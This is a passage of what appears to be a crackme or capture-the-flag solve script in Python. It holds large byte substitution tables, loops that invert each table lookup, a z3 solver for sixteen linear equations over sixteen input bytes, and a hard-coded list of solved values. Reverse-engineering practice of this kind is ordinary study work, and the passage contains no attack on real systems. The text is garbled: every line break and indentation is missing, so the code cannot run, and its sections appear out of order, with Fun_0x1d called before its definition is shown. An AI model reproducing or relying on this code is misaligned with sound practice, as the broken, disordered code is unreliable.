0xFB, 0x59, 0x2D, 0x29, 0x39, 0x62, 0x97, 0xAA, 0xD7, 0x7D, 0x94, 0x2C, 0xFC, 0x5D, 0xB4, 0x7C, 0x8A, 0x82, 0xD3, 0xA7, 0xBA, 0xDF, 0x21, 0xE6, 0xA2, 0xD0, 0xE8, 0xF0, 0x67, 0x3A, 0xB9, 0x98, 0xF9, 0xAE, 0xD1, 0x56, 0xD8, 0xCA, 0x10, 0xEA, 0x92, 0xA8, 0x75, 0x7E, 0x65, 0xA9, 0xAF, 0x51, 0xC9, 0x8E, 0xD4, 0x77, 0xE4, 0x49, 0x06, 0x61, 0x9E, 0x24, 0xD9, 0x9B, 0x11, 0x05, 0x1D, 0x96, 0x9A, 0xB1, 0xE0, 0x83, 0xE1, 0x1C, 0xCD, 0xF3, 0x38, 0xB3, 0x57, 0x50, 0xF4, 0xAC, 0xEB, 0x14, 0xA5, 0x46, 0xF6, 0x93, 0xAD, 0x7B, 0x30, 0xEF, 0x79, 0x17, 0x47, 0xDA, 0xC0, 0xDD, 0xDE, 0xDC, 0x5A, 0x76, 0x3B, 0x31, 0x0D, 0x0E, 0x86, 0xF1, 0x71, 0xFA, 0x0C, 0x00, 0xA3, 0xBF, 0x64, 0x37, 0x22, 0xD2, 0x69, 0x5C, 0xC6, 0x16, 0x9F, 0x5E, 0x7A, 0x1E, 0x27, 0x60, 0x6E, 0xF8, 0x8C, 0xEE, 0xC2, 0x74, 0x81, 0x8B, 0x33, 0x03, 0xBD, 0x2A, 0x0A, 0x68, 0x6B, 0x3F, 0x4C, 0xC3, 0x15, 0x04, 0x3D, 0x63, 0xF5, 0xAB, 0xCC, 0x3C, 0x53, 0x20, 0x66, 0xC4, 0xC1, 0x23, 0xE7, 0x25, 0x55, 0xC7, 0xED, 0xB7, 0xBC, 0xCB, 0x8D, 0x09, 0xCE, 0x52, 0xBB, 0xE2, 0xC5, 0xB6, 0x26, 0x12, 0x2F, 0x99, 0x58, 0x40, 0x6D, 0xA1, 0x3E, 0x48, 0x85, 0xA6, 0xF2, 0x0F, 0x43, 0x78, 0xB8, 0x01, 0xE5, 0xD5, 0x6F, 0x4E, 0xF7, 0x13, 0x42, 0xEC, 0x45, 0x2B, 0x4F, 0x36, 0xDB, 0x9C, 0xE3, 0x44, 0x34, 0x84, 0x73, 0x2E, 0x7F, 0xFD, 0x91, 0x41, 0xD6, 0x95, 0x18, 0xFF, 0x70, 0xC8, 0x02, 0x5F, 0x08, 0x1B, 0x6A, 0x5B, 0x19, 0xA0, 0x4D, 0x35, 0x54, 0xE9, 0x32, 0x88, 0x72, 0x07, 0x87, 0x90, 0x4A, 0x80, 0x1F, 0x9D]def Fun_0xd():for i in range(len(input)):for j in range(len(byte_422D80)):if byte_422D80[j] == input[i]:input[i] = jbreakbyte_422B80 = [0x38, 0xD9, 0xDA, 0xE6, 0xB5, 0xF1, 0x0B, 0x93, 0x0C, 0x58, 0x0D, 0xAE, 0x0A, 0x85, 0x2A, 0x50, 0xC2, 0xBF, 0xD4, 0x28, 0x52, 0xC4, 0x4F, 0xE1, 0x44, 0xE0, 0xA2, 0x70, 0x36, 0x65, 0x4B, 0x41, 0x9D, 0x5F, 0x05, 0x7C, 0xF7, 0xD7, 0x99, 0x8B, 0xCC, 0xCE, 0x16, 0xBE, 0xB6, 0xC5, 0x8F, 0x79, 0xC7, 0x20, 0x7E, 0xF4, 0xF3, 0x2E, 0x4A, 0x89, 0xD6, 0x0F, 0x6E, 0xB0, 0x61, 0xB1, 0x6D, 0x19, 0x73, 0x03, 0x74, 0xA1, 0x40, 0xEC, 0xC0, 0x57, 0x94, 0x7A, 0x66, 0xD5, 0xEA, 0x17, 0x6A, 0x84, 0x37, 0xED, 0xF6, 0x13, 0x31, 0x5B, 0x82, 0x1E, 0xFC, 0x92, 0xE2, 0x42, 0x86, 0xBA, 0xE3, 0x91, 0x7F, 0x67, 0x5C, 0x98, 0x15, 0x22, 0x8D, 0x80, 0x04, 0xE4, 0x25, 0x09, 0xA0, 0xAD, 0x63, 0xE5, 0xB4, 0x9A, 0x3C, 0xA3, 0x3A, 0x69, 0xF8, 0xCD, 0xBC, 0x88, 0x55, 0xB2, 0xBD, 0x6B, 0x77, 0x71, 0xB3, 0xD3, 0x90, 0x75, 0x06, 0x49, 0xC3, 0x32, 0x4D, 0x1D, 0xA8, 0xAA, 0xFB, 0x7B, 0x7D, 0x2B, 0xA6, 0x34, 0x72, 0x47, 0xF0, 0x2F, 0x9C, 0x08, 0x00, 0x14, 0x8C, 0x26, 0x5E, 0x87, 0xD1, 0xCF, 0xC9, 0x18, 0x51, 0x23, 0xCB, 0xF5, 0x1C, 0x9F, 0x97, 0xF9, 0xBB, 0xA7, 0x39, 0x45, 0x02, 0xFD, 0x46, 0x8A, 0x54, 0xA4, 0x8E, 0x9E, 0x68, 0x96, 0x0E, 0x78, 0xB8, 0x3D, 0x11, 0x64, 0xAF, 0x10, 0xDE, 0x6C, 0x60, 0x5A, 0x76, 0x1A, 0xE9, 0xC1, 0x3E, 0xCA, 0x9B, 0x27, 0x30, 0xEF, 0xFF, 0x07, 0xD2, 0xB9, 0x2D, 0xD0, 0xEE, 0x83, 0xAB, 0xF2, 0x4C, 0xA5, 0x21, 0x62, 0x81, 0x33, 0x1B, 0xD8, 0x6F, 0xAC, 0x3B, 0x5D, 0xE8, 0xFA, 0x3F, 0xDB, 0x95, 0xE7, 0x59, 0x12, 0x48, 0x35, 0xC6, 0x2C, 0x4E, 0x01, 0xDD, 0x43, 0x29, 0xDC, 0x24, 0x1F, 0xB7, 0xA9, 0xEB, 0xC8, 0xFE, 0x56, 0xDF, 0x53]def Fun_0xb():for i in range(len(input)):for j in range(len(byte_422B80)):if byte_422B80[j] == input[i]:input[i] = jbreakbyte_422780 = [0x0F, 0xA5, 0xBA, 0x03, 0xF9, 0x69, 0x2A, 0xD7, 0xEA, 0xB5, 0xFC, 0xA1, 0x39, 0x20, 0x68, 0x72, 0x25, 0xB2, 0x6C, 0xAD, 0x88, 0x51, 0x73, 0xEB, 0xCF, 0x13, 0xDE, 0x7C, 0x6D, 0x38, 0x05, 0x09, 0xC2, 0x96, 0x1F, 0x7F, 0x37, 0x4A, 0xC9, 0xE7, 0x6A, 0xB0, 0x59, 0xF7, 0xD2, 0xB9, 0x16, 0xC8, 0xEE, 0xA9, 0x18, 0x80, 0xAC, 0xE3, 0x9E, 0x6F, 0x3C, 0x2F, 0x3E, 0x9A, 0xBE, 0x1D, 0xB4, 0x7B, 0x7D, 0x32, 0x6B, 0x74, 0xC5, 0xC0, 0xC7, 0xD1, 0x29, 0x98, 0xDD, 0xB6, 0x0E, 0x4D, 0xBF, 0x79, 0x0D, 0xDA, 0x7A, 0x17, 0x71, 0x43, 0x87, 0xFF, 0xDC, 0xC6, 0x12, 0xE9, 0x67, 0x2D, 0x70, 0x9F, 0x95, 0x30, 0x26, 0x24, 0x2B, 0xA8, 0xA2, 0xD8, 0x3B, 0x31, 0xA0, 0x3D, 0x4B, 0x90, 0x60, 0x34, 0x75, 0xE8, 0x5D, 0xF4, 0x85, 0xF3, 0xFE, 0x35, 0xCB, 0xB8, 0x02, 0x50, 0xB1, 0xF1, 0x1A, 0x1B, 0x21, 0xCD, 0xC4, 0x7E, 0xED, 0x07, 0xD9, 0xD6, 0x44, 0x15, 0x8E, 0x49, 0xB3, 0x97, 0xE6, 0x63, 0xB7, 0xEF, 0x3A, 0x8F, 0xF2, 0x53, 0x10, 0x77, 0x86, 0xF8, 0x8A, 0x28, 0x3F, 0xD4, 0x4C, 0xE5, 0x82, 0x83, 0xEC, 0x62, 0x89, 0xDF, 0xC3, 0x14, 0xCA, 0xA3, 0x5F, 0x64, 0x47, 0xFD, 0x00, 0x84, 0x66, 0xA7, 0x5A, 0x0C, 0x01, 0xD5, 0x5B, 0x0A, 0x4F, 0x27, 0x78, 0x0B, 0x2E, 0x48, 0x36, 0xFA, 0x08, 0x56, 0xE0, 0xA6, 0xC1, 0x5C, 0x8B, 0x41, 0x06, 0xBB, 0x52, 0x93, 0xAF, 0x2C, 0x5E, 0xF6, 0x61, 0xF0, 0xAB, 0x91, 0x45, 0x04, 0xBD, 0xCC, 0xE4, 0x65, 0x9D, 0x92, 0xCE, 0x40, 0xAE, 0x76, 0x9B, 0x9C, 0xAA, 0x54, 0xD0, 0x1C, 0x81, 0x4E, 0x57, 0x55, 0x23, 0x6E, 0x1E, 0x99, 0xDB, 0xFB, 0xA4, 0x22, 0x19, 0x58, 0x11, 0x8D, 0x94, 0xD3, 0xE2, 0x8C, 0xF5, 0x42, 0x46, 0xBC, 0x33, 0xE1]def Fun_0x7():for i in range(len(input)):for j in range(len(byte_422780)):if byte_422780[j] == input[i]:input[i] = jbreakbyte_422580 = [0x00, 0x74, 0x59, 0xC6, 0xAC, 0xD3, 0xC1, 0xA0, 0x88, 0x3F, 0x1C, 0x28, 0x17, 0x22, 0xC5, 0x38, 0xF9, 0x1B, 0x21, 0x49, 0x99, 0xAF, 0xD6, 0x95, 0xA4, 0x9D, 0x5D, 0x5B, 0x73, 0xFE, 0xC9, 0x9A, 0x4C, 0xB4, 0x27, 0x5E, 0x71, 0x25, 0xE2, 0x90, 0xC0, 0x62, 0x5F, 0x48, 0x77, 0xE0, 0xF2, 0x8E, 0x40, 0xC7, 0x79, 0x1A, 0xDC, 0xF3, 0x01, 0xB6, 0xD8, 0xB5, 0x67, 0x1E, 0x85, 0x12, 0x68, 0x87, 0xD0, 0x30, 0xEB, 0x2F, 0x50, 0xCF, 0xEE, 0xDD, 0xFB, 0xE6, 0xA5, 0x69, 0x05, 0x75, 0xB7, 0xEF, 0x70, 0x53, 0xFF, 0xBA, 0x80, 0x41, 0x9B, 0xA1, 0x39, 0xF8, 0x65, 0x1F, 0x7A, 0x51, 0x98, 0xAD, 0x02, 0x13, 0x18, 0xC3, 0x31, 0x89, 0xCD, 0xCA, 0x91, 0xD1, 0x78, 0x57, 0x47, 0xB8, 0x54, 0x9F, 0x96, 0x04, 0x23, 0x2B, 0xE5, 0x46, 0x29, 0x7C, 0x76, 0x82, 0xBC, 0xFC, 0x6E, 0xEC, 0xED, 0x64, 0x4A, 0x26, 0x34, 0x5C, 0x19, 0x55, 0xFD, 0x6D, 0xFA, 0x7E, 0xB2, 0xD4, 0xF1, 0xF6, 0xE4, 0x60, 0xB0, 0x52, 0x9E, 0x8F, 0xBB, 0x08, 0x3B, 0x97, 0xE8, 0x10, 0x6C, 0x44, 0x3A, 0x36, 0x35, 0x03, 0xC4, 0x81, 0x9C, 0xAB, 0xCB, 0x66, 0xAA, 0x37, 0xA2, 0xD2, 0xE1, 0xE9, 0x7B, 0x14, 0x8D, 0xD9, 0xF5, 0x0B, 0xC2, 0x07, 0xA8, 0x0D, 0xA3, 0x0A, 0x84, 0x6B, 0x2C, 0xEA, 0x0C, 0xAE, 0x7D, 0x6F, 0xD7, 0xE7, 0xC8, 0x3C, 0x45, 0xCC, 0x58, 0xB9, 0x3D, 0x33, 0x4E, 0x4B, 0x8C, 0xCE, 0x72, 0x6A, 0x8B, 0x2D, 0x24, 0x11, 0xDF, 0x5A, 0x2E, 0x92, 0xDA, 0x86, 0x94, 0xA7, 0xD5, 0x4F, 0x2A, 0xB3, 0x63, 0x61, 0xE3, 0xDE, 0x43, 0x1D, 0xBF, 0x15, 0x32, 0xBE, 0x16, 0x3E, 0x93, 0x7F, 0x83, 0x56, 0x06, 0xF7, 0x8A, 0x20, 0xBD, 0x0E, 0xA6, 0xDB, 0x0F, 0xB1, 0x42, 0xF0, 0x09, 0x4D, 0xA9, 0xF4]def Fun_0x5():for i in range(len(input)):for j in range(len(byte_422580)):if byte_422580[j] == input[i]:input[i] = jbreakbyte_422380 = [0x45, 0x1F, 0x63, 0x81, 0xE6, 0xAD, 0x4F, 0xD3, 0xC0, 0x15, 0x69, 0x8F, 0x0D, 0x31, 0x0C, 0xB0, 0xF1, 0x2E, 0x98, 0xC1, 0xC2, 0x96, 0xB2, 0xEB, 0xBF, 0xDF, 0x17, 0xF4, 0x7F, 0xE5, 0x66, 0x73, 0xD8, 0x56, 0x46, 0x20, 0x9C, 0x77, 0x3D, 0x72, 0xA3, 0x91, 0x49, 0x68, 0x4C, 0x1E, 0xAE, 0x06, 0x7A, 0x94, 0xDD, 0x52, 0x55, 0x2C, 0xB8, 0x42, 0x79, 0xFE, 0x38, 0xEF, 0x8B, 0xF7, 0xAC, 0xDC, 0xFF, 0x78, 0x34, 0x70, 0xA9, 0xCE, 0x3F, 0x0E, 0x11, 0x43, 0x5B, 0xF8, 0xAF, 0xD0, 0xFA, 0x33, 0xBA, 0xCF, 0x4A, 0xC9, 0x88, 0x4E, 0x80, 0x10, 0x85, 0x37, 0x12, 0xAB, 0xE1, 0x61, 0xB7, 0x3E, 0x4D, 0x19, 0x3A, 0x04, 0x8C, 0x92, 0x0B, 0xE7, 0x3C, 0xEA, 0xC7, 0x16, 0x35, 0xB1, 0xA7, 0x8E, 0x40, 0x9F, 0xB6, 0xB5, 0x25, 0xA0, 0x5A, 0x30, 0x7D, 0xA2, 0x1A, 0x64, 0xC5, 0x6D, 0x74, 0x82, 0x08, 0x7E, 0xD2, 0xF6, 0xAA, 0xDA, 0xED, 0x4B, 0x6E, 0xE8, 0xE9, 0xE2, 0xD4, 0x71, 0xB9, 0x09, 0x84, 0x3B, 0xC4, 0x1C, 0x60, 0xFD, 0x22, 0x99, 0x39, 0x97, 0x18, 0x89, 0x7C, 0xA4, 0x27, 0xBD, 0x0F, 0xCC, 0x95, 0xF5, 0xB3, 0x65, 0x6B, 0x8A, 0x58, 0x36, 0xBB, 0x9E, 0x75, 0xD1, 0x03, 0x9D, 0x6A, 0x6C, 0x53, 0x05, 0xB4, 0xE4, 0xEE, 0x67, 0x87, 0x7B, 0x32, 0x2D, 0x24, 0x2A, 0x59, 0xEC, 0x0A, 0xDB, 0x21, 0x07, 0x23, 0x50, 0x02, 0x41, 0xF2, 0x83, 0xD9, 0x26, 0xBC, 0x6F, 0x86, 0xA6, 0x93, 0xF9, 0xC8, 0xD6, 0xA5, 0x1D, 0xE3, 0xE0, 0xFC, 0xCA, 0x1B, 0x5E, 0x8D, 0x2F, 0x5C, 0xBE, 0x47, 0xA8, 0x44, 0x57, 0x54, 0x48, 0xC3, 0x00, 0x62, 0x5D, 0xCB, 0xD7, 0x76, 0xCD, 0x28, 0xD5, 0x14, 0x90, 0x13, 0xDE, 0x5F, 0xF0, 0x01, 0x2B, 0xC6, 0x29, 0x9A, 0x9B, 0x51, 0xF3, 0xFB, 0xA1]def Fun_0x3():for i in range(len(input)):for j in range(len(byte_422380)):if byte_422380[j] == input[i]:input[i] = jbreakbyte_422280 = [0x7A, 0x91, 0x9F, 0x23, 0x71, 0xD1, 0x63, 0xDB, 0x59, 0x0A, 0xEC, 0x69, 0xEE, 0x76, 0x5D, 0x64, 0x37, 0x42, 0x8C, 0x0B, 0x3C, 0x5C, 0x80, 0xAD, 0x6A, 0x03, 0x43, 0x93, 0xBC, 0xBF, 0xE3, 0xAF, 0x5A, 0x8A, 0x65, 0x0D, 0x31, 0xDF, 0x3E, 0xA7, 0xE4, 0xDD, 0xB4, 0xB0, 0x56, 0x1C, 0x12, 0xA4, 0x9E, 0xD8, 0x3D, 0x81, 0x60, 0x9A, 0xCB, 0xFA, 0xB1, 0xE0, 0xD3, 0xF4, 0xA2, 0x26, 0x68, 0x90, 0x4B, 0x45, 0x85, 0x20, 0x16, 0xDE, 0xED, 0x4C, 0x6F, 0x34, 0xDC, 0xBE, 0xD2, 0x46, 0x33, 0x14, 0x77, 0xC6, 0xCD, 0xF0, 0xC5, 0xAC, 0x1F, 0xD0, 0x95, 0x97, 0x3F, 0xD7, 0x52, 0xAE, 0xB9, 0xC9, 0x0C, 0xCA, 0x4E, 0xF1, 0xB7, 0x39, 0x7F, 0x27, 0x2B, 0x40, 0x4A, 0x51, 0xA1, 0xCC, 0xCE, 0x6E, 0x70, 0xFF, 0x0E, 0xEF, 0x8E, 0x25, 0xB3, 0x5E, 0x6C, 0xAB, 0x02, 0x49, 0xE9, 0x9B, 0x36, 0x13, 0x9C, 0x04, 0x35, 0xC0, 0xFB, 0x3A, 0x67, 0xB6, 0x9D, 0xC2, 0x73, 0xB5, 0x6D, 0xCF, 0x83, 0x2C, 0x01, 0xC1, 0x10, 0x6B, 0x79, 0x87, 0x5B, 0x57, 0x47, 0xE5, 0x15, 0xF7, 0xA5, 0x74, 0xAA, 0x53, 0x7D, 0x2E, 0xD5, 0xA3, 0x19, 0xF5, 0x2D, 0xFD, 0x61, 0x8D, 0xC8, 0x1B, 0xC3, 0xDA, 0xF6, 0x72, 0x54, 0x5F, 0x1E, 0xE8, 0x17, 0x50, 0xB2, 0xE7, 0x0F, 0x7E, 0x55, 0xBD, 0x86, 0x00, 0x78, 0x94, 0x92, 0x09, 0x2F, 0xD6, 0xD9, 0xF3, 0x29, 0xE6, 0x24, 0x32, 0x66, 0x22, 0x41, 0xC4, 0x7C, 0x05, 0x98, 0x44, 0x4F, 0x99, 0xA9, 0xE1, 0x8F, 0x08, 0x1A, 0x2A, 0x11, 0xEA, 0x3B, 0xE2, 0x38, 0xB8, 0x18, 0xF9, 0xD4, 0xC7, 0x62, 0x7B, 0x75, 0x58, 0x96, 0x28, 0xEB, 0x06, 0x84, 0x89, 0x48, 0x82, 0x88, 0xA6, 0xFE, 0xA0, 0xF2, 0xF8, 0x1D, 0x8B, 0xFC, 0xA8, 0x21, 0x30, 0xBB, 0x07, 0xBA, 0x4D]def Fun_0x2():for i in range(len(input)):for j in range(len(byte_422280)):if byte_422280[j] == input[i]:input[i] = jbreakFun_0x1d()Fun_0x17()Fun_0x13()Fun_0x11()Fun_0xd()Fun_0xb()Fun_0x7()Fun_0x5()Fun_0x3()Fun_0x2()for i in range(len(input)):print(chr(input[i]),end = "")from z3 import *inputt = [BitVec(f"inputt[{i}]",8) for i in range(16)]dword_422040 = [0x00027FC8, 0x00029049, 0x0003336C, 0x0002C6A7, 0x00036CB0, 0x0001F2BB, 0x00035262, 0x0002AEDF, 0x0002955E, 0x0002EE10, 0x0002B057, 0x0002FDE8, 0x00029B92, 0x00035842, 0x000294D2, 0x0002B984]x = Solver()x.add(dword_422040[0] == (159 * inputt[8]+ 109 * inputt[12]+ 14 * inputt[0]+ 92 * inputt[14]+ 211 * inputt[4]+ 178 * inputt[7]+ 57 * inputt[2]+ 175 * inputt[5]+ 170 * inputt[11]+ 59 * inputt[6]+ 200 * inputt[9]+ 5 * inputt[15]+ 48 * inputt[13]+ 28 * inputt[3]+ 18 * inputt[10]+ 228 * inputt[1] ) & 0xffffffff )x.add(dword_422040[6] == (173 * inputt[11]+ 34 * inputt[5]+ 69 * inputt[4]+ 216 * inputt[14]+ 225 * inputt[9]+ 160 * inputt[1]+ 207 * inputt[10]+ 175 * inputt[7]+ 121 * inputt[0]+ 122 * inputt[2]+ 179 * inputt[12]+ 91 * inputt[13]+ 181 * inputt[8]+ 93 * inputt[3]+ 121 * inputt[6]+ 12 * inputt[15] )&0xffffffff )x.add(dword_422040[8] == (215 * inputt[11]+ 164 * inputt[5]+ 97 * inputt[2]+ 99 * inputt[3]+ 188 * inputt[4]+ ((inputt[9] << 7)& 0xffffffff )+ 214 * inputt[6]+ 106 * inputt[8]+ 169 * inputt[0]+ 28 * inputt[14]+ 18 * inputt[12]+ inputt[1]+ 177 * inputt[10]+ 114 * inputt[7]+ 176 * inputt[15]+ 25 * inputt[13] )&0xffffffff )x.add(dword_422040[9] == (175 * inputt[14]+ 42 * inputt[4]+ 214 * inputt[12]+ 43 * inputt[13]+ 147 * inputt[6]+ 53 * inputt[10]+ 12 * inputt[1]+ 213 * inputt[7]+ 241 * inputt[9]+ 223 * inputt[5]+ 65 * inputt[3]+ 42 * inputt[15]+ 131 * inputt[2]+ 81 * inputt[0]+ 92 * inputt[11]+ 110 * inputt[8] )&0xffffffff )x.add(dword_422040[13] == (57 * inputt[0]+ 109 * inputt[7]+ 60 * inputt[2]+ 228 * inputt[13]+ 166 * inputt[4]+ 236 * inputt[9]+ 100 * inputt[6]+ 179 * inputt[11]+ 20 * inputt[12]+ 45 * inputt[8]+ 204 * inputt[3]+ 182 * inputt[14]+ 84 * inputt[10]+ 170 * inputt[15]+ 199 * inputt[5]+ 138 * inputt[1] )&0xffffffff )x.add(dword_422040[10] == (98 * inputt[11]+ 122 * inputt[9]+ 237 * inputt[12]+ 117 * inputt[0]+ 34 * inputt[3]+ 168 * inputt[8]+ 135 * inputt[10]+ 119 * inputt[6]+ 91 * inputt[2]+ 161 * inputt[15]+ 152 * inputt[7]+ 186 * inputt[4]+ 187 * inputt[13]+ 72 * inputt[14]+ 36 * inputt[5]+ 171 * inputt[1] )&0xffffffff )x.add(dword_422040[7] == (184 * inputt[9]+ 112 * inputt[0]+ 107 * inputt[11]+ 170 * inputt[13]+ 55 * inputt[8]+ 85 * inputt[14]+ 212 * inputt[10]+ 173 * inputt[15]+ 166 * inputt[12]+ 142 * inputt[4]+ 202 * inputt[5]+ 63 * inputt[2]+ 30 * inputt[7]+ 175 * inputt[3]+ 217 * inputt[6]+ 63 * inputt[1] )&0xffffffff )x.add(dword_422040[15] == (((inputt[7] << 6) &0xffffffff)+ 228 * inputt[4]+ 90 * inputt[11]+ 85 * inputt[3]+ 196 * inputt[6]+ 219 * inputt[0]+ 93 * inputt[14]+ 183 * inputt[15]+ 156 * inputt[12]+ 197 * inputt[8]+ 119 * inputt[13]+ 36 * inputt[10]+ 205 * inputt[2]+ 94 * inputt[9]+ 153 * inputt[5] )&0xffffffff )x.add(dword_422040[5] == (9 * inputt[4]+ ((inputt[5] << 6)& 0xffffffff)+ 62 * inputt[1]+ 58 * inputt[7]+ 100 * inputt[13]+ 137 * inputt[11]+ 6 * inputt[0]+ 119 * inputt[9]+ 180 * inputt[6]+ 228 * inputt[8]+ 88 * inputt[12]+ 107 * inputt[15]+ 56 * inputt[14]+ 207 * inputt[2]+ 248 * inputt[10]+ 150 * inputt[3] )&0xffffffff )x.add(dword_422040[3] == (38 * inputt[7]+ 194 * inputt[4]+ 105 * inputt[0]+ 150 * inputt[6]+ 75 * inputt[1]+ 89 * inputt[15]+ 99 * inputt[14]+ 98 * inputt[3]+ 91 * inputt[8]+ 178 * inputt[12]+ 117 * inputt[2]+ 48 * inputt[13]+ 239 * inputt[10]+ 233 * inputt[11]+ 63 * inputt[5]+ 250 * inputt[9] )&0xffffffff )x.add(dword_422040[11] ==( 30 * inputt[8]+ 13 * inputt[5]+ 206 * inputt[3]+ 234 * inputt[15]+ 71 * inputt[7]+ 239 * inputt[12]+ 141 * inputt[10]+ 179 * inputt[13]+ 113 * inputt[14]+ 181 * inputt[9]+ 52 * inputt[6]+ 74 * inputt[11]+ 168 * inputt[4]+ 239 * inputt[1]+ 164 * inputt[0]+ 179 * inputt[2] )&0xffffffff )x.add(dword_422040[14] == (211 * inputt[1]+ 74 * inputt[5]+ 144 * inputt[8]+ 234 * inputt[0]+ 241 * inputt[2]+ 157 * inputt[11]+ 25 * inputt[15]+ 6 * inputt[10]+ 243 * inputt[6]+ 107 * inputt[9]+ 77 * inputt[12]+ 127 * inputt[4]+ 67 * inputt[7]+ 13 * inputt[14]+ 151 * inputt[3]+ 127 * inputt[13] )&0xffffffff )x.add(dword_422040[2] == (209 * inputt[9]+ 110 * inputt[7]+ 22 * inputt[10]+ 102 * inputt[11]+ 187 * inputt[1]+ 58 * inputt[8]+ 236 * inputt[6]+ 146 * inputt[13]+ 205 * inputt[15]+ 63 * inputt[2]+ 211 * inputt[4]+ 152 * inputt[3]+ 82 * inputt[14]+ 14 * inputt[5]+ 49 * inputt[12]+ 251 * inputt[0] )&0xffffffff )x.add(dword_422040[12] == (230 * inputt[0]+ 27 * inputt[3]+ 186 * inputt[10]+ 58 * inputt[7]+ 121 * inputt[1]+ 59 * inputt[14]+ 90 * inputt[12]+ 40 * inputt[2]+ 230 * inputt[11]+ 25 * inputt[6]+ 198 * inputt[5]+ 81 * inputt[4]+ 71 * inputt[13]+ 180 * inputt[8]+ 149 * inputt[9]+ 73 * inputt[15] )&0xffffffff )x.add(dword_422040[4] == (188 * inputt[5]+ 80 * inputt[1]+ 221 * inputt[6]+ ((inputt[12] << 6) & 0xffffffff)+ 230 * inputt[3]+ 123 * inputt[8]+ 124 * inputt[11]+ 253 * inputt[0]+ 202 * inputt[10]+ 63 * inputt[2]+ 40 * inputt[7]+ 109 * inputt[9]+ 195 * inputt[15]+ 199 * inputt[13]+ 82 * inputt[4]+ 225 * inputt[14] )&0xffffffff )x.add(dword_422040[1] == (236 * inputt[15]+ 44 * inputt[14]+ 214 * inputt[13]+ 52 * inputt[8]+ 37 * inputt[6]+ 101 * inputt[9]+ 244 * inputt[10]+ 238 * inputt[11]+ 109 * inputt[0]+ 188 * inputt[1]+ 20 * inputt[3]+ 87 * inputt[7]+ 93 * inputt[4]+ 158 * inputt[5]+ 105 * inputt[12]+ 3 * inputt[2] )&0xffffffff )assert x.check() == satprint(x.model())input = [None] * 16input[2] = 51input[12] = 11input[3] = 45input[0] = 186input[7] = 186input[13] = 124input[4] = 71input[1] = 42input[11] = 114input[15] = 51input[6] = 42input[10] = 42input[8] = 25input[14] = 209input[9] = 186input[5] = 51print(input)byte_423D80 = [0xD1, 0x9C, 0x68, 0xC0, 0x13, 0xAC, 0x48, 0x32, 0xA3, 0xBA, 0x4C, 0xE7, 0x6D, 0xC8, 0x1C, 0xAB, 0xE2, 0x7A, 0x42, 0xE1, 0x7B, 0x16, 0x67, 0x03, 0xAE, 0x7E, 0xAA, 0x38, 0x22, 0x02, 0x39, 0x51, 0xC7, 0x79, 0xD7, 0xCB, 0xEF, 0x62, 0x98, 0xDC, 0x53, 0x72, 0x89, 0xA5, 0x4B, 0xC6, 0x86, 0xF6, 0xFC, 0x77, 0x5A, 0xF5, 0x2E, 0x3D, 0xB2, 0xFE, 0x59, 0x27, 0x80, 0x63, 0xDD, 0x1A, 0x12, 0x5E, 0xED, 0xB0, 0xBC, 0xC4, 0x5F, 0x11, 0xC9, 0x09, 0xC5, 0x75, 0x96, 0x0A, 0x2F, 0x00, 0x17, 0x81, 0x14, 0x47, 0xBB, 0x9D, 0x8E, 0x3C, 0xD6, 0xA1, 0xE0, 0xA2, 0x26, 0x5D, 0x08, 0x6E, 0x4E, 0xF1, 0xCF, 0x73, 0x8A, 0x90, 0x0B, 0xB3, 0x3E, 0xB6, 0x1F, 0xC3, 0xB7, 0xDA, 0x8D, 0x05, 0xEE, 0x18, 0x93, 0x3A, 0x6A, 0x8C, 0x43, 0x8F, 0xEB, 0xE9, 0x5B, 0x29, 0x37, 0x1E, 0x46, 0x33, 0x31, 0xFB, 0x35, 0x34, 0x61, 0x04, 0x0E, 0x2B, 0x74, 0xF9, 0x8B, 0x2C, 0x20, 0x0C, 0x7C, 0x28, 0x5C, 0xCA, 0xE6, 0x6B, 0xD8, 0x30, 0xE4, 0x21, 0x44, 0x70, 0x06, 0xA6, 0x60, 0x41, 0x84, 0x10, 0x95, 0x4F, 0x64, 0x83, 0xD2, 0x9A, 0xBE, 0xAF, 0x9F, 0x07, 0xC1, 0xB8, 0x3B, 0x65, 0xCC, 0x57, 0xB5, 0xD9, 0x92, 0xDE, 0x0D, 0xE3, 0xF3, 0xA4, 0xBD, 0x6F, 0xD3, 0x25, 0x88, 0x71, 0xFF, 0xA9, 0x36, 0xB1, 0x78, 0x24, 0x69, 0xAD, 0x19, 0xBF, 0xFD, 0xCD, 0x4A, 0xEA, 0x87, 0x91, 0xA8, 0x66, 0x82, 0x50, 0x0F, 0x99, 0x45, 0xF2, 0xD5, 0x9B, 0x94, 0x7D, 0xCE, 0xDB, 0xB9, 0x52, 0xE5, 0xF4, 0x01, 0x7F, 0xD4, 0x15, 0x2D, 0x3F, 0x1D, 0xA7, 0xC2, 0xFA, 0x40, 0xE8, 0xA0, 0x55, 0x6C, 0xF7, 0x1B, 0x58, 0x85, 0x56, 0x9E, 0xEC, 0x97, 0x23, 0xF0, 0x4D, 0xD0, 0xF8, 0x2A, 0x49, 0xB4, 0x76, 0x54, 0xDF]def Fun_0x1d():for i in range(len(input)):for j in range(len(byte_423D80)):if byte_423D80[j] == input[i]:input[i] = jbreakbyte_423780 = [0x38, 0x5A, 0xC7, 0x98, 0x15, 0x6A, 0xC9, 0x28, 0x33, 0xEA, 0xF4, 0xD9, 0xDB, 0x77, 0xB8, 0x49, 0x1B, 0x79, 0xF5, 0xFD, 0x3E, 0xA2, 0xDE, 0x17, 0xC4, 0x5E, 0xE5, 0x11, 0xB6, 0x1D, 0x86, 0xF9, 0x90, 0x78, 0x8A, 0x14, 0x12, 0xB1, 0xC2, 0x21, 0xF1, 0x02, 0x58, 0xA1, 0x23, 0x0C, 0xAD, 0xA5, 0x50, 0x48, 0x1E, 0x6D, 0xF8, 0x96, 0x9D, 0x19, 0x00, 0xBD, 0x26, 0xCE, 0xA7, 0x24, 0x2E, 0x39, 0x7B, 0xFA, 0x5F, 0xCC, 0x1A, 0x0B, 0x40, 0x0F, 0x4B, 0x82, 0xE2, 0x97, 0x10, 0x2A, 0xFC, 0x3B, 0xB2, 0x66, 0x27, 0x54, 0x07, 0xE3, 0x08, 0xA3, 0xA6, 0xED, 0x62, 0x13, 0x9C, 0x20, 0x01, 0x92, 0xE8, 0xAE, 0xBE, 0xE1, 0x0A, 0x41, 0x94, 0x80, 0xA9, 0x2F, 0x29, 0x70, 0x35, 0x16, 0xF7, 0x6B, 0xFE, 0x9E, 0x0D, 0xD3, 0x7F, 0x1F, 0xA0, 0x32, 0xD2, 0x52, 0x05, 0x76, 0x89, 0x9B, 0x7A, 0x8F, 0x99, 